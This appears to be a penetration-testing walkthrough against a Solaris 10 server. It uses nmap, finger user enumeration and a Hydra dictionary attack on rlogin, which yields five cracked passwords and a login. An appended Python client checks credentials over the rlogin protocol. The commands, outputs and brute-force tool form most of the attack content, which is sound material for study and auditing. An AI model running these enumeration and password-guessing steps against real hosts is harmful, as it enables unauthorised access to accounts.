The rlogin service sends passwords in the clear and grants host-based trust through .rhosts, so it is best switched off in favour of SSH for remote logins. What follows is a penetration test of a Solaris 10 server running fingerd and rlogin. To start, let's scan the target host for the two ports of interest.
Scanning the host
root@asus:~/pentest_notes% nmap -sV -O -p79,513 osiris.acme.com

Starting Nmap 7.01 ( https://nmap.org ) at 2018-12-26 23:05 MST
Nmap scan report for osiris.acme.com
Host is up (0.0022s latency).
PORT    STATE SERVICE VERSION
79/tcp  open  finger  Sun Solaris fingerd
513/tcp open  login
MAC Address: 08:00:27:63:61:B7 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Sun Solaris 9|10, Sun OpenSolaris
OS CPE: cpe:/o:sun:sunos:5.9 cpe:/o:sun:sunos:5.10 cpe:/o:sun:opensolaris
OS details: Sun Solaris 9 or 10, Sun Solaris 9 or 10, or OpenSolaris 2009.06 snv_111b
Network Distance: 1 hop
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.68 seconds
root@asus:~/pentest_notes%
Both scanned ports are open: fingerd on 79 and the rlogin service on 513 (nmap only probed those two, so the OS fingerprint warning is expected). Our next step is to query the finger daemon to see who is currently logged in.
Query the finger daemon
root@asus:~/pentest_notes% finger @osiris.acme.com
Login       Name               TTY         Idle    When    Where
root     Super-User            console       3 Wed 22:37  :0
stacey          ???            pts/3         1 Wed 22:39  192.168.0.100
larry           ???            pts/4           Wed 22:21  192.168.0.132
barrett         ???            pts/5           Wed 22:44  192.168.0.33
slade           ???            pts/6           Wed 22:40  192.168.0.10
hayes           ???            pts/7           Wed 22:11  192.168.0.232
virginia        ???            pts/8           Wed 22:05  192.168.0.5
root@asus:~/pentest_notes%
This is the list of usernames we will use to guess a valid login/password combination (the ??? in the Name column only means those accounts have no full name set in the password file). If we go further and query a specific user, we get back the same row: the username, the TTY, the login time and the remote host the user connected from, which gives us insight into how their internal network is addressed (everything here sits in 192.168.0.x).
root@asus:~/pentest_notes% finger larry@osiris.acme.com
Login       Name               TTY         Idle    When    Where
larry           ???            pts/4           Wed 22:40  192.168.0.132
root@asus:~/pentest_notes%
Now we can try to gain access to the remote host with a dictionary attack, using our enumerated names, a rockyou wordlist and the Hydra tool. Hydra's own summary shows 42 login tries (l:7/p:6), so the rockyou.txt used for this demonstration is a six-line excerpt of the real list, not the full file.
Using Hydra to crack remote logins
root@asus:~/pentest_notes% hydra -L rlogin-users.txt -P rockyou.txt rlogin://osiris.acme.com
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-26 22:55:17
[DATA] max 16 tasks per 1 server, overall 64 tasks, 42 login tries (l:7/p:6), ~0 tries per task
[DATA] attacking service telnet on port 23
[513][rlogin] host: osiris.acme.com   login: larry   password: bc04hnu
[513][rlogin] host: osiris.acme.com   login: barrett   password: 3633mb
[513][rlogin] host: osiris.acme.com   login: slade   password: zenun77
[513][rlogin] host: osiris.acme.com   login: hayes   password: cubby1
[513][rlogin] host: osiris.acme.com   login: virginia   password: sexy1984
1 of 1 target successfully completed, 5 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-12-26 22:55:50
root@asus:~/pentest_notes%
Hydra reports five valid passwords. (Its "[DATA] attacking service telnet on port 23" line does not match the rlogin:// target we gave it; the hits themselves are tagged [513][rlogin], so the rlogin module on port 513 is what actually ran.) The next step is to confirm one of the combinations interactively on the host. For this we will use rlogin to verify our results.
Testing remote logins
root@asus:~/pentest_notes% rlogin osiris.acme.com -l virginia
The authenticity of host 'osiris.acme.com (192.168.0.130)' can't be established.
RSA key fingerprint is SHA256:pqvyzr0herRl6SBTTwJdx5K4kfNjbTkoU4boVeE983I.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'osiris.acme.com' (RSA) to the list of known hosts.
Password:
Last login: Wed Dec 26 23:25:18 2018 from 192.168.0.100
Oracle Corporation      SunOS 5.10      Generic Patch   January 2005
$ id
uid=108(virginia) gid=1(other)
$ exit
Connection to osiris.acme.com closed.
root@asus:~/pentest_notes%

As you can see, the login succeeded and we now have a local shell on the remote host from which to try to gain higher privileges.

One caveat on that session: the host-key prompt, the "RSA key fingerprint", "Permanently added ... to the list of known hosts" and "Connection to osiris.acme.com closed" lines are all OpenSSH client messages. On many Linux distributions the openssh-client package provides rlogin as an alias for ssh, so this "rlogin" went to sshd (port 22, which the nmap scan above did not probe), not to the rlogin service on port 513. The password is confirmed either way, but to exercise rlogin itself you need a real rlogin client (for example the rsh-client package on Debian-based systems) or a client that speaks the RFC 1282 protocol directly.
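The credential check over the real rlogin protocol, as an added example that is not the post's own code and serves both the Hydra step and the verification step above: a minimal client that connects to TCP/513 from a reserved source port, sends the four NUL-terminated fields of RFC 1282, reads the status byte, answers the Password: prompt in the data stream and classifies the outcome. The host, user and password arguments, the `vt100/9600` terminal field, the 0x01 failure status (BSD rlogind behaviour), the prompt and failure strings and the requirement to run as root (rlogind rejects non-reserved source ports) are assumptions stated in the code.

```python
"""Checking one username/password pair over the rlogin wire protocol (RFC 1282).

Added example, not the page's own code: the page's "rlogin" output is
OpenSSH's. This client speaks real rlogin to TCP/513. rlogind requires a
reserved source port (512-1023), so it must run as root.
"""
import errno
import socket
import sys
import time
from typing import Callable, Tuple

RLOGIN_PORT = 513
TERM_SPEED = "vt100/9600"                      # terminal type/speed field; value is arbitrary
FAILURE_MARKERS = (b"Login incorrect", b"Permission denied")   # assumed login(1) failure text
PROMPT_ENDINGS = (b"$ ", b"# ", b"% ", b"> ")                  # assumed shell prompts


def build_handshake(client_user: str, server_user: str, term_speed: str = TERM_SPEED) -> bytes:
    """Client header: NUL, local user, NUL, remote user, NUL, term/speed, NUL.

    client_user is whatever the client claims to be; rlogind believes it
    only when .rhosts or hosts.equiv trust the source host, which is the
    classic rlogin weakness.
    """
    for value in (client_user, server_user, term_speed):
        if "\x00" in value:
            raise ValueError("rlogin fields are NUL-terminated; NUL is not allowed in them")
    fields = b"\x00".join(v.encode("ascii") for v in (client_user, server_user, term_speed))
    return b"\x00" + fields + b"\x00"


def classify_banner(data: bytes) -> str:
    """Interpret the server's first bytes after the handshake."""
    if not data:
        return "closed"        # dropped before any status byte
    if data[:1] == b"\x01":
        return "refused"       # BSD-style rlogind: 0x01 + message (e.g. bad source port)
    if data[:1] != b"\x00":
        return "not-rlogin"    # something else is listening here
    body = data[1:]
    if b"Password:" in body:
        return "password"      # no host trust: login(1) wants a password
    if body.endswith(PROMPT_ENDINGS):
        return "shell"         # trusted host: straight to a shell, no password
    return "open"              # status OK, nothing decisive yet


def classify_login_reply(data: bytes) -> str:
    """Interpret what came back after the password was sent."""
    if any(marker in data for marker in FAILURE_MARKERS):
        return "failed"
    if data.endswith(PROMPT_ENDINGS):
        return "shell"
    return "unknown"


def read_until(sock: socket.socket, done: Callable[[bytes], bool], timeout: float) -> bytes:
    """Accumulate bytes until done(buf) is true, the peer closes, or the timeout passes."""
    buf = b""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline and not done(buf):
        sock.settimeout(max(0.1, deadline - time.monotonic()))
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            break
        if not chunk:
            break
        buf += chunk
    return buf


def bind_reserved_port(sock: socket.socket) -> int:
    """Bind a free port in 512-1023; rlogind rejects other source ports."""
    for port in range(1023, 511, -1):
        try:
            sock.bind(("", port))
            return port
        except OSError as exc:
            if exc.errno == errno.EADDRINUSE:
                continue
            raise              # EACCES: not running as root
    raise OSError("no reserved port free")


def rlogin_try(host: str, server_user: str, password: str,
               client_user: str = "root", timeout: float = 5.0) -> Tuple[str, bytes]:
    """One credential check against host:513. Returns (verdict, raw transcript)."""
    decisive = ("refused", "not-rlogin", "password", "shell")
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        bind_reserved_port(sock)
        sock.settimeout(timeout)
        sock.connect((host, RLOGIN_PORT))
        sock.sendall(build_handshake(client_user, server_user))
        banner = read_until(sock, lambda b: classify_banner(b) in decisive, timeout)
        verdict = classify_banner(banner)
        if verdict != "password":
            return verdict, banner
        sock.sendall(password.encode("ascii") + b"\r")      # rlogin sends CR for Enter
        reply = read_until(sock, lambda b: classify_login_reply(b) != "unknown", timeout)
        return classify_login_reply(reply), banner + reply
    finally:
        sock.close()


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} host user password   (run as root)")
    verdict, transcript = rlogin_try(sys.argv[1], sys.argv[2], sys.argv[3])
    print(verdict)
    print(transcript.decode("utf-8", errors="replace"))
```

A `not-rlogin` verdict is exactly what you would get pointing this at port 22: the first bytes would be an `SSH-2.0-` banner rather than the rlogin status byte, which is the difference the OpenSSH-flavoured session above papers over. A `shell` verdict straight from the banner means the source host is trusted via .rhosts or hosts.equiv and no password was needed at all.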